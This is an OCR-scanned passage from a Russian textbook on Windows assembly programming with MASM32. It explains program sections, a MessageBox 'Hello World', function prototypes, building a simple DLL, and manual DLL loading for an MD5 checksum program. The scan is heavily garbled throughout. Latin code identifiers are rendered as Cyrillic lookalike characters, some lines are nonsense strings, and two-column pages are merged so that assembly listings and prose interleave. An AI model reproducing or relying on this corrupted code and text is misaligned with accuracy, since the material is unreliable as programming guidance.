Все четыре директивы описывают секции в образе исполняемого файла. В адресном 
пространстве программы \132 нет специфических сегментов, но существует возмож- 
ность поделить его на логические секции. Начало следующей секции отмечает конек 
предыдущей. Возможны две группы секций: данных и кода. 

„РАТА - эта секция содержит инициализированные во время трансляции программы 
данные (переменные, строки, массивы). 

РАТА? -— эта секция содержит неинициализированные данные программы. 
Преимущество неинициализированных данных в том, что они описываются (резервиру- 
ются), но не включаются в образ исполняемого файла. Вы всего лишь сообщаете транс- 
лятору, сколько места вам нужно выделить в момент загрузки программы в памяти для 
размещения статических неинициализированных переменных, получающих свои знач ^ 
ния в процессе работы программы. 

‚СОМ$Т -— эта секция содержит объявления константных ячеек, используемь“ 
программой в режиме только чтение. 


.« 
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р ими ии опа ко Ваау у пазов олаль ООО РА 


При написании программ не обязательно задействовать все три секции данных. О 
являются только те, которые действительно будут востребованы. 

Для размещения исполняемого кода программы возможно наличие, и только в ед 
ственном экземпляре, секции .СОРЕ. Ее структура описана ниже. 


. СОЛЕ 
<метка>: 


епЯ <метка> 


<метка> — любая произвольная метка, устанавливающая границы кода программ 
Обе метки должны быть идентичны. Весь код должен располагаться между этими гра 
цами. Поле <метка> также является точкой запуска (стартовой функцией) программы. 

А теперь обсудим, что представляет собой текст программы "НеЦо \МонА" и что он дела 

Целью нашей первой программы является вывод на экран сообщения. Поскольку ( 
\пдо\з может осуществлять вывод информации только в соответствующие окна, ! 
должны после запуска программы создать окно сообщений и по завершении рабо 
с ним пользователя осуществить правильный выход в систему. 

ОС \Мтдо\з обладает огромным количеством программных ресурсов \/тдо\з А 
(АррИсацоп Ргозгтаттте Пиегсе) и предоставляет их программам в виде готовых 
использования функций. Эти функции размещаются в нескольких системных модуля; 
динамически загружаемых библиотеках Кегпе!32.41, изег32.9И и 24132.41. Кете!32. 
содержит функции взаимодействия с памятью и управления процессами. Ф5ег32. 
контролирует пользовательский интерфейс. ©9132.4П ответственнен за графичесь 
операции. Кроме трех "основных", существуют также другие библиотеки, которые мс 
но использовать, при условии обладания достаточным количеством информации об 
вызовах. 

Приложение \тдо\з на этапе загрузки динамически связывается с необходимы 
для ее работы библиотеками, таким образом, болышая часть ее кода сосредоточена в э1 
библиотеках и она осуществляет лишь вызовы в заданной последовательности для рен 
ния поставленной перед ней задачи. 

Для правильной сборки исполняемого модуля \/тдо\з программы и удовлетворег 
всех внешних ссылок на вызовы ОС динамических библиотек транслятору и компон! 
щику нужна информация о необходимых \тдо\$ программе АР! и их месторасполо> 
нии. Эта информация хранится в библиотеках импорта. Обязательно следует произ! 
дить связывание программ с "правильными" библиотеками импорта, в противном слу* 


о 
Ни не смогут корректно работать. Эту информацию мы сообщаем среде разработки с. 
Дующими строками: 
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зчованна спипон ино нана о вон ия а зан яч ан очи с оч ино воине ао нии нуна ная ии рами ОБОИ ии мои ие пооомою мозоль, 


1пс1а4е \пазм32\ 1пс1и4е\ итп ом5 . 1пс 
$ пс] а4е \пазш32\1пс1и4е\ Хегле132.1пс 
+ пс1и9е11Ь Кегле1 32.11 

{ пс109е \пазм32\1пс104е\изег32, 1 пс 
1пс199е11Ь 9$ег32.11 

При их обработке транслятор МА$МЗ2, встретив строку шсшде 

\пазт3 2\Мистае\и том пс, открывает файл улпдо\з пс, находящийся в директории 
\МАЗМЗ2\МСГОРЕ, и загружает его содержимое как часть нашей программы (по ана-: 
логии с включаемыми файлами в языке С). 3 

Файл умпдомзшс содержит в себе определения системных констант и структур“ 
\Ипдо\5. Что касается прототипов системных вызовов, необходимо включение допол- 1 
нительных файлов из директории \тазт32\тс!иде, соответствующих необходимым ди- 
намически загружаемым библиотекам разрабатываемому проекту. 

В нашей программе мы вызываем функции, экспортированные из библиотек 
изег32.4Й и Кегпе!3 2.41, и соответственно, для этого мы должны подключить прототипы 
функций из изег32.41 и Кете! 2.91. Это файлы — изег3З2.шс и Кеге!32 лис. Если Вы 
откроете их в текстовом редакторе, Вы увидите, что они состоят из описаний прототиг 
функций этих РЕ. 

Подключение файлов директивой шсшде еще не обеспечивает разрешения адресов фу 
ций, требующихся разрабатываемой программе. Транслятору необходимо также сообщить 
имена библиотек экспорта. И туг мы встречаем новую директиву шсадеНЪ. В отличие от ди- 
рективы шсшае, она является лишь способом сообщить ассемблеру, с какими библиотеками 
собираемая программа должна связываться перед началом своей работы. 

Возможно указание имен библиотек импорта и в командной строке при запуске ком- 
поновщика, но это малоудобно, да и командная строка может вместить максимум 128 
символов. Доступные библиотеки экспорта располагаются в директории \тазт32\Н. 
Подробное описание системных вызовов и место их расположения в библиотеках экс- 
порта ОС \Итдо\з можно найти в документации М$ЬМ или другой справочной литера- 
туре по программированию для \т4о\5. 

орЕ1оп сазещар: попе 






Данная строчка программы вынуждает транслятор МА$МЗ32 определять символиче- 
ские метки, чувствительные к регистру, таким образом, имена ЕхИРгосез$ и ехИргосез$ 
будут восприниматься как различные последовательности символов. 

Итак, выполнение программы начинается со строки, находящейся за меткой зап. 
И это вызов 

{пуоке МеззадеВох, МОБЬ, адЧхг МзавохТехе, а9аг М59СарЕ1от, МВ_ОК 


Известно, что вызов подпрограмм на языке ассемблер осуществляется командой про- 
цессора са| с указанием адреса подпрограммы. Ассемблер МА$МЗ2 имеет в своем синтак- 
сисе расширенную директиву вызова подпрограммы (функции), которая, в конце концов, 
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транслируется в упомянутую выше команду сай, но при этом автоматизирует все работу 
по поддержанию интерфейса вызова функции (работу со стеком). В нашем случае это: 


разв 0 

разв ОЕЕзее МзаСарЕ1от 
ра5Н ОЕЁЕзее МзавохТехе 
разв 0 

са] 1 МеззадеВохА 


Рассмотрим подробнее механизм прототипов функций. Для того чтобы МА$МЗ2 
смог правильно транслировать вызов директивы ПМУОКЕ, необходимо перед ним сде- 
лать определение данной функции в виде прототипа, специфицирующего имя функции 

з 
количество и типы передаваемых параметров. Как уже отмечалось, это делается в соот- 
ветствующих включаемых файлах. Например, ф 

. ‚ функция МеззареВохА определя 
в файле изег32 1пс в виде: ° ее 


Мез5адеВохА РКОТО : ОМОКО, : РИОБО, : ОИОВЬ, : ИОКО 


Строка выше называется прототипом функции. Прототип функции указывает 
ассемблеру/линковшику атрибуты функции, так что он может самостоятельно делать 
проверку этих типов. Формат записи прототипов функций следующий: 

ИмяФункции РВОТО [ИмяПараметра]: 
ТипДанных, [ИмяПараметра] :ТипДанных,... 


Говоря кратко, за именем функции следует ключевое слово РВОТО, а затем список 
переменных с указанием типа данных, разделенных запятыми. В приведенном выше 
примере с МеззавеВохА эта функция была определена как принимающая четыре 
параметра типа Р\УОКО. Прототипы функций очень полезны, когда использ тя 
высокоуровневый синтаксический вызов — шуоке с проверкой типов данных. у 

Следует пояснить, почему в тексте программы записан вызов МеззасеВох, а мы 
обсуждаем имя МеззареВохА. Дело в том что существует две категории АР1 функций: 
одна ля работы ‚со строками формата АМ$1, а другая для Итисо4е строк. На конце 
и й Р функций АМ ставится А", например МеззазеВохА. В конце имен функций 
АИ Ви — МеззазеВох\М. Транслятор в зависимости от используемой 
и ески делает замену «обобщенного» имени на специфическое — 
ой её вой. С пример, 1140%\5 95 поддерживает только АМ$1 формат строк 
ман у льзование функций, оканчивающихся на "А", У/шдо\з МТ, 

{ ‚ ориентирована на Оп!соде. 
ще и имеем еле АМЗ1 строками (например, массивы символов, оканчиваю- 
ре уаз р -символа — | байт. В то время как АМ$Т достаточна для 
у Хх языков, а не поддерживает некоторые. восточные языки, в которых при- 

тысяч уникальных символов. Вот в этих случаях в дело вступает 
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звании ни носков о ооо во вов ва ва воньниия ооо ри вов ов я као вара в ии ово з ори вре р рр обинив ни вваньн в вв а вич оао ии ан ор вв невань 


аи 

Следуя документации на функцию МеззареВох в нашей программе, мы передаем сл. 
дующие параметры: . 

МОБ - (признак модальности) значение принадлежности нашего окна какому-либ, 
другому окну (описатель окна) или рабочему столу \/тдо\з (в случае МУЫ.); итак 
наше окно принадлежит рабочему столу; 

адаг Мз2ВохТехе — адрес строки заголовка нашего окна (директива аЧ4г аналогична 
директиве оН5е! для вычисления смещения в текущем сегменте, не забываем о модели 
памяти ЕГАТ); 

адаг МзеСарИоп — адрес строки сообщения, отображаемого в окне; 

МВ_ОК - тип окна сообщения, определяющий внешний вид окна; нас интересует 
окно подтверждения с кнопкой "ОК". 

Вызов функции МеззасеВох отобразит на экране компьютера окно рис. 4.4, которое 
может быть закрыто нажатием на кнопку "ОК" или на кнопку закрытия окна — "с крестиком". 

Для корректного завершения работы нашей программы необходим вызов функции 
ЕхиРгосез$ из библиотеки Кегпе!32.41. 


1пуоке Ех1ЕРгосезз, МОБЬ 


Функция принимает единственный параметр, являющийся кодом завершения пр. 
Граммы, передаваемый \/тдо\з в виде возвращаемого значения стартовой функпи: 
МОНЫ является признаком успешного завершения работы программы. 


5.4. Динамически загружаемые библиотеки 


Как уже было сказано, любая программа для \тдо\/з во время своей работы польз}. 
ется сервисами ОС, экспортируемыми ее динамически загружаемыми библиотеками. 
В этом' разделе мы разработаем простейшую динамически загружаемую библиотеку. 
предоставляющую свои вызовы программе для УЛпдо\з, и обсудим механизм ее работы. 

Зачастую при написании различных программ возникает необходимость использова- 
ния в них одних и тех же общих подпрограмм (функций), повторяя их текст в каждой 
новой разработке. Во времена РОЗ программисты сохраняли эти общие фрагменты кода 
в одной или более библиотеках. Для подключения их в свой очередной проект они с00б- 
щали линковщику о необходимости связывания той или иной библиотеки с построенным 
транслятором объектным файлом, и линковщик извлекал требующиеся функции прямо 
из этой библиотеки и вставлял их в результирующий исполняемый файл. Такой пропесс 
называется статической компоновкой. Хорошим примером этого является стандартная 
библиотека языка С. Однако у этого метода есть изъян: в каждой программе у вас нахо- 
дятся абсолютно одинаковые копии кода. Впрочем, для ДОСовских программ это не 
очень большая проблема, так как только одна программа могла быть активной в текущий 
момент, и поэтому не происходила трата драгоценной памяти (не считая дисковой). 





за 
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В \тдо\з ситуация стала более критичной, так как в определенный момент времени 

может быть загружено несколько программ, выполняющихся одновременно, и проблема 
ационального использования оперативной памяти становится еще более значимой. Как 

е говорилось, у \тдо\з есть решение этой проблемы: динамические загружаемые 
библиотеки. И в свете обсуждаемого вопроса можно сказать, что динамически загружае- 
мая библиотека — это что-то вроде носителя общего кода для \Ут4о\з программ. И по- 
этому, ОС \Итао\з не будет загружать несколько копий РЕ в память в случае работы 
нескольких программ или копий одной программы, завязанных на некоторую динамиче- 
ски загружаемую библиотеку. 

В реальности, у всех процессов, использующих одну и ту же РЫ,, есть своя копия 
ввиртуальном адресном пространстве кода этой библиотеки, однако \/тдо\з делает 
так, чтобы все процессы разделяли одну копию этой РЁ, в физической памяти. 
Впрочем, секция данных библиотеки все же является уникальной для каждого процесса. 

Программа линкуется с ОШ. на этапе ее загрузки на выполнение, в отличие от того 
как это осуществлялось в случае статических библиотек во время сборки. Существует 
также возможность загрузить и, соответственно, выгрузить РЫ. во время выполнения 
программы с помощью системных вызовов. Естественно, если только ваша программа 
в данный момент использует некоторую библиотеку РЕГ, тогда она будет выгружена из 
памяти немедленно. Но если ее еще используют какие-нибудь другие программы, БИТ. 
останется в памяти, пока ее не выгрузит последняя из использующих ее программ. 

При сборке программы, использующей динамически загружаемые библиотеки, перед 
компоновщиком стоит сложная задача разрешения адресов в конечном исполняемом 
файле. Поскольку он не может "извлечь" функции и вставить их в финальный исполняе- 
мый файл, он должен каким-то образом сохранить достаточно информации для загруз- 
чика \У/т4о\з о требуемых программой ОШ. и используемых функциях в выходном 
файле, чтобы тот смог найти и загрузить верную ОШ. во время выполнения. 

Здесь в дело и вступают библиотеки импорта. Библиотека импорта содержит 
информацию о ОГГ, которую она описывает. Компоновщик может получить из нее не- 
обходимую информацию и вставить ее в исполняемый файл. Когда У/тдо\з загружает 
программу в память, она видит, что программа требует ту или иную ОЫ., поэтому за- 
грузчик ищет эту библиотеку и проецирует ее в адресное пространство процесса (загру- 
жаемой программы) и тогда уже выполняет разрешение адресов вызовов функций. 

Как уже говорилось, возможна загрузка библиотеки ОГ, самостоятельно во время 
выполнения программы, не полагаясь на \т4о\з-загрузчик. В этом случае Вам не 
потребуется библиотека импорта и Вы сможете загружать и использовать любую ОМ, 
даже если к ней не прилагается библиотеки импорта. Тем не менее, все равно необходи: 
мо располагать информацией о том, какие функции находятся внутри библиотеки, числс 
и типы передаваемых и возвращаемых параметров. 
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Когда вы «поручаете» \Ипдо\$ загружать РЫ., и если та отсутствует, \Мтас, 
выдаст соответствующее сообщение и ваша программа не сможет сделать ничего, даже 
если наличие данной П\.1, не является критичным, поскольку будет закрыта. Если же Вы 
будете загружать ОШ. самостоятельно и библиотека не будет найдена, ваша программа 
может самостоятельно обработать данную ошибку и выдать пользователю сообщение. 
уведомляющее об этом, и, возможно, продолжить работу. . 

Вы можете вызывать недокументированные функции, которые не включены в официальные 
библиотеки импорта, главное, чтобы у вас было достаточно информации о семантике этих 
функций. Для организации программной загрузки библиотеки ОШ. требуются навыки работы 
с системными вызовами \/тдо\уз, знание Г.оадГабгагу и Се{РгосАЯ@гез$ (об этом ниже). 

Итак, начнем разработку простейшей динамически загружаемой библиотеки для 
У/тдоуз, экспортирующей единственную тестовую функцию. 

В среде разработки КадАзт выбираем в меню Ейе пункт Ме\м Рго}ес{. В появившемся 
окне (рис. 5.4.1) выбираем тип нового проекта, обратите внимание на то, что это должен 
быть проект динамически загружаемой библиотеки (ОИ Ргодес®), и заполняем соответст- 
вующие поля в имени проекта (Ргозес! Мате) и строки его описания (Рго}ес{ Оезсирйоп). 
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Рис. 5.4.1. Мастер проектов — тип и имя 


Нажимаем кнопку "Далее" (Мех. Содержимое следующего окна (рис. 5.4.2) создани * 
проекта динамически загружаемой библиотеки требует некоторого пояснения. 

Как уже известно, в этом окне осуществляется выбор файлов и каталогов, котор» - 
будут созданы для нашего нового проекта. Что касается именно проекта ОЕ, то в не 
появились новые опции создания шс и Ое{ файлов. Файлы с расширением пс, как И 
вестно, носят имена соответствующих библиотек экспорта и используются для описан!` 
структур данных и прототипов функций включаемых в соответствующую библиотег` 








ре. Файлы с расширениями .деР являются файлами установок модулей разрабатывае- 
мых РЕ и описывают их структуру и характеристики. 
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Рис. 5.4.2. Мастер проектов — Файлы и директории 


Как уже говорилось, последнее окно (рис. 5.4.3) предназначено для тонкой настройки 
окружения сборки, а в нашем случае все установки по умолчанию являются достаточны- 


мн. Поэтому нажимаем на кнопку "Готово" (Ет15В) и набираем текст соответствующих 
исходных файлов. 
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Сотре ВС: 4048В\АСЕХЕ №7 

Аззетые: 3.0.38 \МСЕХЕ 2с /соЙ /Ср подо А" 
Цик: 7.0. $В\ЫМКЕХЕ 25ИВ5УСТЕМ.МИНОО 
Вип 00.5 ' 
_ Выти/Чеьид ОЛОВО ОЬа,5 

Аез То ОЫ тзс.оы,0.$В\СУТНЕ. ЕХЕ таслез 

Азт Моде: —*оБ.0 $ВАМЕ ЕХЕ 7с /соН Кр подо Л 


| < Назад тет ] Отмена ! 











Рис. 5.4.3. Мастер проектов - Настройка меню Маке 
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Нижеприведенная программа — это каркас РЛ.. Каждая ЮЫ. должна имет, На5ОН. — это описатель модуля РЕ... Вам следует сохранить это значение, посколь- 
стартовую функцию. \/тфо\з вызывает эту функцию каждый раз, когда ОЕ, подключа. ку оно понадобится для работы библиотеки 
ется к процессу и отключается от него (если быть более точным, в случае создания из. = теазоп — ситуация, в которой проиходит поключение/отключение библиотеки, — 
вершения очередной нити выполнения программы) с целью инициализации внутренних может иметь одно из следующих четырех значений, определенных в файле \190\53.1шс. 
структур данных. РЕГ РКОСЕ$5_АТТАСН - БЫ, получает это значение, когда впервые загружается 
, в адресное пространство процесса. Вы можете использовать эту возможность для того, 
еее ееннннннн-н === 
; Тез=011.азм чтобы осуществить инициализацию. 


еее анна н = ОРЦ, РКОСЕЗ$ РЕТАСК - РЕ получает это значение, когда выгружается из 
адресного пространства процесса. Вы можете использовать эту возможность для того, 
чтобы освободить память, закрыть открытые файлы и т. д. 

, РЕ. ТНКЕАО АТТАСК - РЦ. получает это значение, когда процесс создает новую нить. 


‚цое1 Е1аЁ,$ЕЯса11 
орЕ1оп сазещар: попе 
10с1и9е \пазм32\1пс1 де \ м1 п9ом$. 1 пс 


. Г, ТНВЕАР_РЕТАСК - 11, по ет это значение, ко - 
1пс1049е \пазш32\1пс1а4е\ п5ег32.1пс ` ры _ луча а ‚› когда нить в процессе унич 
1пс1и4е11Ь \пази32\115\Хегпе132.11Ъ тожается. . . 
{пс1и4е \пазц32\ 1пс1 иде \ кегле1 32. 1пс Признаком успешной инициализации библиотеки является возвращение стартовой 
11с109е11ю \пазп32\11Ь\изех32.11Ь функцией значения ТКОЕ в регистре вах. Если вы возвратите ЕАГ$Е, ОЫ. не будет 


загружена. Например, если ваш инициализационный код должен зарезервировать память 


„Часа и он не может это сделать, стартовой функции следует возвратить ЕАТ.$Е, чтобы пока- 
д зать, что РЫ, не может запуститься. 
. сое НА НА 
| Вы можете поместить ваши кции в РЫ, следом за ст 
| 211ЕпЕгу ргос НТпзЕОЬЬ:НЕМ$ТАМСЕ, геазоп:РИОКО, гезегуеа1: МОВр Но р функц 6 д а стартовой функцией или до 
| поу вах, ТВОЕ нее. Но если вы хотите, чтобы их можно было вызвать из других программ, вы должны 
тее поместить их имена в списке экспорта в файле установок модуля (см. файл Те И.дев). 


О11ЕПЕку Епар Обычно в первой строке этого файла должна быть строка с ключевым словом 


ПВКАКУ, которое определяет модуль О. Раздел экспорта, задаваемый ключевым 
Тезегупсе1ол ргос рагам:РИОВр словом ЕХРОЕТ$, сообщает линкеру, какие функции в РИ, экспортируются для созда- 
поу вах, ратап : ния файла с расширением „16 — библиотеки экспорта. В нашем примере нужно, чтобы 
ее РИПСЕ ее пар | другие модули могли вызывать Тез{ЕипсНоп, поэтому мы указываем здесь ее имя. 
Наша тестовая экспортируемая функция получает в качестве параметра значение 
двойного слова и в качестве подтверждения своей работоспособности возвращает его 
в виде результата (в регистре еах). 


Епа 021 1]Елегу 


























ТезеРипсе1оп ргос рагам: ВИОВО 5.5. Разра приложения 
вычисления контрольных сумм 


ЪТВКАВУ — Тезе011 
ЕХРОВТ$ — ТезеРипс& {оп В заключение нашего небольшого экскурса в программирование на языке ассемблера 
Вы можете назвать стартовую функцию, как пожелаете, главное, чтобы ее имя размещалоср для \тдо\з рассмотрим программу, осуществляющую вычисление контрольной сум- 
еше и в строке ЕМО. Эта функция получает три параметра, только первые два из них важны. мы, задаваемой пользователем строки по алгоритму МЬ5 из библиотеки Мгозой Сгурю 


5.5.1. Интерфейс пользователя 
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я " " $56] 4 'М05 Вазй са1су]абог',13,10,13,10 
АР1. В ней будет продемонстрирована техника "ручного" связывания с динамичес, аропе $6114 аь 1 (с) 2003 Бу мт',0 


загружаемой библиотекой, а также реализован диалоговый интерфейс пользовать. 
. ля 
посредством оконных средств ОЛ ОС \/тд0\5. 














‚даа? 
| Для дальнейшего обсуждения необходимо в среде КадАЗМ подготовить 2 Проекта Низ аа ? 
файлы исходных кодов представлены ниже. Один проект представляет собой диалого. 
вую оболочку и создается мастером проектов как приложение \/т32Арр с именем па пеззаче а ы © 
и, соответственно, файлами п145.азт, п145.гс, п195.4её; второй проект — динамически За Сава ЕтиеЕ РЕ ЕКАИЕ <> 
. . < . ^ е п 
гружаемая библиотека (ОН Рго]ес® с именем тзсарй и файлами тзсарй-азтл, пизсари. Че орептт тета 
Следует обратить особое внимание на название проекта ОТ, и соответствующий резуль. пазп м1п Вапате да? 
тирующий файл тзсари.ЯЙ, поскольку именно это имя используется в диалоговой про- св119_919_вапа1е аа ? 
грамме при "ручном" связывании. | : 
| ВЬ1Ь 94а ? 
; №45. азм | Тез Рилсе1 оп 94 ? 
в . 93 ? 
.386 епс_Чес 
Е аЬ 512 дар (?) 
‚поде1 1ае, заса] 1 тез 1 Е _риЕЕет р 
:пс109е \пазш32\1пс]1аде\ м1пом5. 1 пс ‚соде 
1пс114е \пази32\ 110с1и4е\ кегле! 32. 1пс 11901 9РГОс гос з&4са11, венипа: амога, @@мшза:амога, 
1пстаче 11 кегпе1 32.11 . @урагап:Чмога, @@1рагам: Чмог@а 
11с104е \пази32\1пс10е \ п5ег32.1пс 
10с109е11р изег32.11Ь разнаа 
ТОМ ЕТЬЕ ЕХ!Т еаи 100 
_ — х, [ @@бип5 
ТОМ НЕБР АВООТ еда = 900 поч вах, | 9 
ТЬБ_СНТЬО_ОЬб еаи 100 р ср еах, ИМ ТМТТОТАЬОб 
Трс ТМРУТ ЕОТТ еп 1000 ‘е 111 а112е 
ТОС ОЗТРУТ ЕР ей = 1001 | 28 
Тс _КЕУ ЕБТТ ечиа 1002 
= г с еах, ИМ СОММАМО 
12С 60 ВОТТОМ еаа 1008 пе я ь МОЕ Напазед 
12С_ЕХТТ_ВОТТОМ еач 1009 И 
Ча | Нап 1е_Сомщапа: 
‘сата доу еах, @@ирагап 
.1РМапе ар "изсар1е.911",0 
: ТОС С0 ВОТТОМ 
21 1 Мосгойпа ЗЬ "СаппоЕ 1оа@Я 11Ьгагу", 0, СТР о БЕ Еоп 
Ралсе1опМацще | ЧБ "Тезегипсе1от", 0 2 - 
РапсЕ топ Мое Роцпа аъ "ТезеРипсе1 оп ЕапсЕ1оп Гог пр ах 10С ЕХТТ ВОТТОМ 
и ! — _ 
опа", 0 ]е Ех Е _ВУЕКОП 
м1пдом (161е ЧЬ 'МО5 ВазВ са1си]а$ох',0 . п ропе МоЕ Нап41еа 
с1аз5_палме ЧЪ 'изсар1е',0 пр - -_ 


аропЕ_&1Е1е аь 'АБоце..,!, 0 - 10161а1127е: 








О 
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.1Е еах==МоЪЬ 
] 91е9 
пр Ропе_Напете | пуоке Меззадевох, МИЬЬ , адааг РопсЕзопмоЕРоцла, аЧаг 
Басков: и1пдом _&1Е1е, МВ_ОК 
ото: пр епа_1оор 
ЕБТТ е15е .. 
$ пуоке бер] а1кем, [св119_919_ Вал 1е], ТОС _ТМРУОТ 
1пуохе бехИ1паочТехе, еах, ЕЕ ее те5и1 Е _ Би ЕЕек, 256 _ Поу [Тез Рипсё 101], еах 
бе ерх, ОЕЕзете тези1Е БчЕЕег ‚.епаз Е 
а94 ерх, еах „епа1Е 
Буре рег [еЪх],0 
оу у р | 1пуоке СеЕМоа\ц ] еНапа1е,0 
разн оЕЁзее гези1е рчЕЕег , ЩоУ [1156], еах 
$ 10п 
са11 [ТезеРопсето ЩОУ [с1аз5_зЕхисе. $у1е],С5 _НВЕРВАМ ог С5_ УВЕОВАМ 
Е еах==юмоть ОУ [<1аз$ _5ЕхисЕ, 1 рЕлИпаРгос] ‚ оЕЁзеё И1пдомРгос 
.1 == - 
{пуоке беер1аТеем, [св119_919 Вапа1е],Т0С_ООТРОТ _ЕОТТ ‚ ВоУ [с1а55 $Егисе. срС15Ехега],0 
1пуоке беси: паомТехе, еах, ОЕЕЗеЕ тезис риЕГех МОУ [с1аз5_5ЕкисЕ. сЬИпаЕхега],0 
| поУ [с1а5$_зЕкисЕ. В1Тпзсапсе] ‚ еах 


1 1еЗ | 
тр ропе_Напч 1пуоке ГоааТсоп, 0, ТОТ _АРРЬТСАТТОМ 
ЕХ1Е В оп: оу [с] аз5_зЕтисё.НТсоп] , еах 
х1 № 
ыы ф за е, 0 , 
Зохоке Розсоиз Ее 9 1пуохе Гоа9Сихгзот, 0, ТОС _АВКОЙ 





ропе Нала1еа: МОУ [с<1а5$_5Е тосе. ВСиг5отг] , еах 
оп : 
рораа еах, 1 ПО [<1аз5 зе тис. ВргВаскагойпа],СОБОВ ВАСКСКООМО+1 
по , . _ _ 
сес МОУ [с1а$$_эсгисЕ. 1 р52МепоМаме] ‚ оЕЕзек с1а$$ _паще 
р Мое Напатеа: ПО {с1аз5$ 5егисе. 1рз2С1аззМаме],оЕЁЕзее с1аз5 паще 
опе_МоЕ _ : - _ 
рорач сах, еах . 1пуохе Кед1 зсегС]1азз, ОЕЁзее с]аз$ ЗЕКИСЕ 
хо р _ 
те МОУ еах, \5_САРТТОМ ог М5 ЗУ5МЕМО ог №3 МЕМТМТЕЕВОХ ог 
#5 ВОВ 
С1119019Рхгос епар , _ РЕК 
СТАВТ: 1пуоке Сгеатей 1 пдомЕх, 0, оЕЕзее с1аз5_пащме, оЕЕзее 
. \1 подом _Е1Е1е,еах, СИ _ОЗЕРЕРАЮТЬТ, СИ ОЗЕРЕРАОЬТ, 420,140,0,0, ВТпзЕ, 0 
1пуохе Боа4Ь3Ъгагу, аа4г Ъ1РМаме поу [па1п_м1п_Вап91е],еах ‚ 
.1Е еах==МоЪЬ и 1пуоке 
1пуоке МеззадеВох, МОЪЬ, аааг 21 1 Моегоцпа , а991 . Стеаке01а1очРагам, [В1п$е],100_СНТЬр_ВЪС, [ма1п_м1п_КНап91е], оЕЁзе 
, : 2111901 9Р кос, 0 
яуавом ЕЗСТе, ИВ ОК о ах, сах 
7тР 72 епа_1оор 
191 оу ВЬ1Ь, еах ЩОУ [<в119_919_Вапа1е] ,еах 
: 


й {$ пуоке бееРгосАа9гезз, НЬ1Ь, аааг РапсЕ1опМаме 





ООО 
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ооосоньсовьооаиччая зезннесоо оноооо нови рро крат воз новововое эоозноане нова 


НЫ 1пуоке Зои п4ом, [па1п_м1п_ПВап91е],5И_МОВМАЬ 


| ет еах, @@мрагам 
| | ° . ОУ Ьх, ах 
п59_1оор: | с г еах, 16 
| | 4 пуоке РеехМеззадце, оЕЕзее пеззаде, 0, 0,0, РМ_ВЕМОУЕ стр ах, 0 
, ог ах, ах 3 пе @@РеЕам1 + _Ргос 
| 32 по_щеззачде 





спр Ьх, ТОМ ЕТЬЕ_ЕХ1Т 
1луоке 1501 а109Меззаде, [с1118_919_Вап$1е],оЕЕзее пеззаае 



































]е Е1]е_ех1е 
| ог еах, еах 
07. по_щеззаде спр Ьх, ТОМ _НЕБР_АВОСТ 
| . )е аропе 
спр цеззаде. пеззаде, ИМ ООТТ 
)е еп4_1оор 


пр @РеЁам1 Е _Ргос 


$ руоке Тгапз1асеМеззаде, оЕЁзес меззаде 
 пуоке 2: зрасспМеззаде, оЕЁзее шез5аде 


ароме : 
{пуоке МеззааеВох, [па1п_м1п_Вап91е], оЕЁзеЕ ароце зЕг1па, оЕЁзее 
ароцЕ {1%1е,МВ_ОК 
хог еах, еах 
ге 


по_щеззаде: 


пр 59 _1о0р 
11 е_ехЁе: 
с1о5е_ех1: 
ЧезЕхгоу м1 пдом: 
1пуоке РозЕОц1 ЕМеззаде, 0 
рора9 
хог еах, еах 
ге 


еп9_1оор: 
{ пуоке РгееЪ1ргагу, ВЬЗЬ 


ех1 Е: 
1пуоке Ех1 Е Ргосезз$, [щеззаде . чРагам ] 


И 1 пдомР ГОС ргос $ЕЯса11, @@НилЯ: нога, @бимза : Чмога, 


М1паомчРгос епар 
@@мрагам : Чнота, @@1 рагам ; Чмог@ 

















епа ЗТАКТ 
Ера 


















































ризваа 


оу еах, @@мп59 Проведем пошаговый анализ текста программы п145. Как видно программа начинае 


свою работу с метки ЗТАЕТ. Следующий за ней блок кода выполняет «ручное» связыва 


спр еах, ИМ_РЕЗТКОУ ние исполняемого модуля п195.ехе с библиотекой тзсарн.АИ. 


]е Чезегоу м1 поч 
- ОТАВТ: 
спр еах, ИМ_СОММАМО , 
)е @НаптЯ1е _Сомщара 1пуохе ГоаЧЬ1Ргагу, а4а4г 11ЬМапе 
@@реЁац1 $ _Ргос: | .1Е вах==МОЪЬ , 
рорад_ 1пуоке МеззадеВох, МОТЪ ‚ а4ат 211 Моекоцпта , аа4 
+ пуоке РеЕИ1пдомРгос, @@Нмта, 8 @имза, @ @мрагад, @ 81 рагам У1пЧом _1Е1е,МВ_ОК 
ге . ) пр ехиЕ 


@@Напа1е_Соппапа: 
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е15е 
цоу 11, еах А [с<1а55_5Е кис. НргВаскахгочи в], СОБОВ ВАСКСВООМО+1 
1луоке бееРтосАЗагезз, НЬ1р, аадг Рипсе1опМаще = 
| бе [с1а55 _5ЕхисЕ. 1рз2МепиМаще], оЕЁзеЕ с1азз папе 
.1Е еах==МмоьЬ ^ поУ [с1аз$ _ ЗЕГИСЬЕ. 1р52С1аз5Маше], оЕЕзее с1азз _паше 





{3 пуоке МеззадеВох, МОБЬ, аа4х Еипсе1опМоеРоцпа, аде. 
м1 пом _(1Е1е,МВ_ОК 1 пуске Вед1зсетС]азз, оЕЕзее с1аз5$ зЕГиСЕ 
] р ера_1оор Ю 


е1 зе поУ еах, М5_САРТТОМ ог №5 ЗУЗМЕМО ог №5 МТАТМТТЕВОХ ог 


мох [ТезеРапсЕ1оп!, еах я5 ВОВОЕК 


‚ еп91 Е 


‚ера Е 1пуоке Сгеасей1пдомЕх, 0, оЕЕзеё С\а55_паще, оЕЁзее 


упдом_Е1Е1е, еах, СИ _ОЗЕРЕРАОЬТ, СИ ОЗЕРЕРАОЬТ, 420,140,0,0, В1п5Е, о 


Функция Гоа9Ел4Ьгагу принимает в качестве параметра указатель на строку с именем биб. по [дазп м{п Вапа1е], еах 


лиотеки, которую требуется загрузить в адресное пространство текущего процесса, в случае 
успеха возвращается ненулевой ее описатель для дальнейшего манипулирования с ней (им- 
порта функций, выгрузки). В случае неудачи возврашается МОТ, и в данной ситуации наша 
программа отображает соответствующее сообщение и завершает работу. 


пуске 


Стеакер1а1очРагам, [в1п5],10р_СНТЬР_РЪб, [па п_м1п_Вап91е] , оЕЁЕзее 
21119019Рхос,0 ^ 


Далее вызов ОерРгосеззАдагез$, принимающий в качестве параметров описатель р рр 15 
и „ ро [е1®) 
загруженной О, и указатель на строку с именем требующейся функции, в случае успе- —_°°Р 
ха возвращает ее адрес в адресном пространстве текущего процесса, что в дальнейшем пох {св119_919_Вапр@1е], еах 


позволяет осуществлять косвенные вызовы данной функции, естественно, при правиль- 
